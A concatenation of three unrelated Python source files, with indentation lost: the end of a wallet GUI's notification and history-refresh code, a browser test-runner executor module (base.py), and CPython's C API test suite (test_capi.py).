self.full_hist_refresh_timer.stop()
elif parent and parent.history_list.has_unknown_balances:
# Still have 'Unknown' balance. Check if wallet is settled.
if self.need_process_v or not parent.wallet.is_fully_settled_down():
# Wallet not fully settled down yet... schedule this function to run later
self.print_error("History tab: Wallet not yet settled.. will try again in 1 second...")
else:
# Wallet has settled. Schedule an update. Note this function may be called again
# in 1 second to check if the 'Unknown' situation has corrected itself.
self.print_error("History tab: Wallet has settled down, latching need_update to true")
parent.need_update.set()
self._full_refresh_ctr += 1
else:
# No more polling is required. 'Unknown' balance disappeared from
# GUI (or parent window was just closed).
self.full_hist_refresh_timer.stop()
self._full_refresh_ctr = 0
@rate_limited(5.0, classlevel=True)
def process_notifs(self):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if parent.network:
n_ok = 0
txns = self.notifs_get_and_clear()
if txns and parent.wallet.storage.get('gui_notify_tx', True):
# Combine the transactions
total_amount = 0
tokens_included = set()
for tx in txns:
if tx:
is_relevant, is_mine, v, fee = parent.wallet.get_wallet_delta(tx)
if is_relevant:
total_amount += v
n_ok += 1
if parent.is_slp_wallet:
try:
tti = parent.wallet.get_slp_token_info(tx.txid())
tokens_included.add(parent.wallet.token_types.get(tti['token_id'],{}).get('name','unknown'))
except KeyError:
pass
if tokens_included:
tokstring = _('. Tokens included: ') + ', '.join(sorted(tokens_included))
else:
tokstring = ''
if total_amount > 0:
self.print_error("Notifying GUI %d tx"%(n_ok))
if n_ok > 1:
parent.notify(_("{} new transactions: {}{}")
.format(n_ok, parent.format_amount_and_units(total_amount, is_diff=True), tokstring))
else:
parent.notify(_("New transaction: {}{}").format(parent.format_amount_and_units(total_amount, is_diff=True), tokstring))
|
base.py
|
import hashlib
import httplib
import os
import threading
import traceback
import socket
import urlparse
from abc import ABCMeta, abstractmethod
from ..testrunner import Stop
here = os.path.split(__file__)[0]
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def executor_kwargs(test_type, server_config, cache_manager, **kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type == "reftest":
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlparse.urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlparse.urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN"}
def __call__(self, test, result):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message)
return (harness_result,
[test.subtest_result_cls(name, self.test_codes[status], message, stack)
for name, status, message, stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def reftest_result_converter(self, test, result):
return (test.result_cls(result["status"], result["message"],
extra=result.get("extra")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TestExecutor(object):
__metaclass__ = ABCMeta
test_type = None
convert_result = None
def __init__(self, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.external_config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
@property
def logger(self):
"""StructuredLogger for this executor"""
if self.runner is not None:
return self.runner.logger
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
result = self.result_from_exception(test, e)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol):
return "%s://%s:%s" % (protocol,
self.server_config["host"],
self.server_config["ports"][protocol][0])
def test_url(self, test):
return urlparse.urljoin(self.server_url(test.environment["protocol"]), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "ERROR"
message = unicode(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
return test.result_cls(status, message), []
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi):
timeout = test.timeout * self.timeout_multiplier
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.executor.screenshot(test, viewport_size, dpi)
if not success:
return False, data
screenshot = data
hash_value = hashlib.sha1(screenshot).hexdigest()
self.screenshot_cache[key] = (hash_value, None)
rv = (hash_value, screenshot)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def is_pass(self, lhs_hash, rhs_hash, relation):
assert relation in ("==", "!=")
self.message.append("Testing %s %s %s" % (lhs_hash, relation, rhs_hash))
return ((relation == "==" and lhs_hash == rhs_hash) or
(relation == "!=" and lhs_hash != rhs_hash))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
self.message = []
# Depth-first search of reference tree, with the goal
# of reachings a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
while stack:
hashes = [None, None]
screenshots = [None, None]
nodes, relation = stack.pop()
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
if self.is_pass(hashes[0], hashes[1], relation):
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1]) for item in reversed(nodes[1].references)))
else:
# We passed
return {"status":"PASS", "message": None}
# We failed, so construct a failure message
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi)
if success:
screenshots[i] = screenshot
log_data = [{"url": nodes[0].url, "screenshot": screenshots[0]}, relation,
{"url": nodes[1].url, "screenshot": screenshots[1]}]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def retake_screenshot(self, node, viewport_size, dpi):
success, data = self.executor.screenshot(node, viewport_size, dpi)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
harness_result = ("OK", None)
subtest_results = pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
return (harness_result, subtest_results)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class Protocol(object):
def __init__(self, executor, browser):
self.executor = executor
self.browser = browser
@property
def logger(self):
return self.executor.logger
def setup(self, runner):
pass
def teardown(self):
pass
def wait(self):
pass
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
flag = self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("ERROR", message)
finally:
self.result_flag.set()
class WebDriverProtocol(Protocol):
server_cls = None
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def setup(self, runner):
"""Connect to browser via the HTTP server."""
try:
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
except Exception:
self.logger.error(traceback.format_exc())
self.executor.runner.send_message("init_failed")
else:
self.executor.runner.send_message("init_succeeded")
def teardown(self):
if self.server is not None and self.server.is_alive:
self.server.stop()
@property
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = httplib.HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import _thread
import importlib.machinery
import importlib.util
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support import import_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import _testmultiphase
except ImportError:
_testmultiphase = None
# Skip this test if the _testcapi module isn't available.
_testcapi = import_helper.import_module('_testcapi')
import _testinternalcapi
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def decode_stderr(err):
return err.decode('utf-8', 'replace').replace('\r', '')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@support.requires_subprocess()
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error: '
b'PyThreadState_Get: '
b'the function must be called with the GIL held, '
b'but the GIL is released '
b'(the current Python thread state is NULL)'),
err)
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exception(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
orig_sys_exception = sys.exception()
orig_exception = _testcapi.set_exception(new_exc)
new_sys_exception = sys.exception()
new_exception = _testcapi.set_exception(orig_exception)
reset_sys_exception = sys.exception()
self.assertEqual(orig_exception, e)
self.assertEqual(orig_exception, raised_exception)
self.assertEqual(orig_sys_exception, orig_exception)
self.assertEqual(reset_sys_exception, orig_exception)
self.assertEqual(new_exception, new_exc)
self.assertEqual(new_sys_exception, new_exception)
else:
self.fail("Exception not raised")
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned NULL without setting an exception\n'
r'Python runtime state: initialized\n'
r'SystemError: <built-in function return_null_without_error> '
r'returned NULL without setting an exception\n'
r'\n'
r'Current thread.*:\n'
r' File .*", line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an exception')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned a result with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError\n'
r'\n'
r'The above exception was the direct cause '
r'of the following exception:\n'
r'\n'
r'SystemError: <built-in '
r'function return_result_with_error> '
r'returned a result with an exception set\n'
r'\n'
r'Current thread.*:\n'
r' File .*, line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an exception set')
def test_getitem_with_error(self):
# Test _Py_CheckSlotResult(). Raise an exception and then calls
# PyObject_GetItem(): check that the assertion catches the bug.
# PyObject_GetItem() must not be called with an exception set.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.getitem_with_error({1: 2}, 1)
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
if 'SystemError: ' not in err:
self.assertRegex(err,
r'Fatal Python error: _Py_CheckSlotResult: '
r'Slot __getitem__ of type dict succeeded '
r'with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError: bug\n'
r'\n'
r'Current thread .* \(most recent call first\):\n'
r' File .*, line 6 in <module>\n'
r'\n'
r'Extension modules: _testcapi \(total: 1\)\n')
else:
# Python built with NDEBUG macro defined:
# test _Py_CheckFunctionResult() instead.
self.assertIn('returned a result with an exception set', err)
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
lines = out.splitlines()
for i, line in enumerate(lines, 1):
self.assertIn(b'MemoryError', out)
*_, count = line.split(b' ')
count = int(count)
self.assertLessEqual(count, i*5)
self.assertGreaterEqual(count, i*5-2)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_heap_ctype_doc_and_text_signature(self):
self.assertEqual(_testcapi.HeapDocCType.__doc__, "somedoc")
self.assertEqual(_testcapi.HeapDocCType.__text_signature__, "(arg1, arg2)")
def test_null_type_doc(self):
self.assertEqual(_testcapi.NullTpDocType.__doc__, None)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
if Py_DEBUG:
# gh-89373: In debug mode, _Py_Dealloc() keeps a strong reference
# to the type while calling tp_dealloc()
self.assertEqual(type_refcnt, B.refcnt_in_del)
else:
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_heaptype_with_buffer(self):
inst = _testcapi.HeapCTypeWithBuffer()
b = bytes(inst)
self.assertEqual(b, b"1234")
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
if Py_DEBUG:
# gh-89373: In debug mode, _Py_Dealloc() keeps a strong reference
# to the type while calling tp_dealloc()
self.assertEqual(type_refcnt, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
else:
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
obj = _testcapi.HeapCTypeSetattr()
self.assertEqual(obj.pvalue, 10)
obj.value = 12
self.assertEqual(obj.pvalue, 12)
del obj.value
self.assertEqual(obj.pvalue, 0)
def test_pynumber_tobase(self):
from _testcapi import pynumber_tobase
self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
self.assertEqual(pynumber_tobase(123, 8), '0o173')
self.assertEqual(pynumber_tobase(123, 10), '123')
self.assertEqual(pynumber_tobase(123, 16), '0x7b')
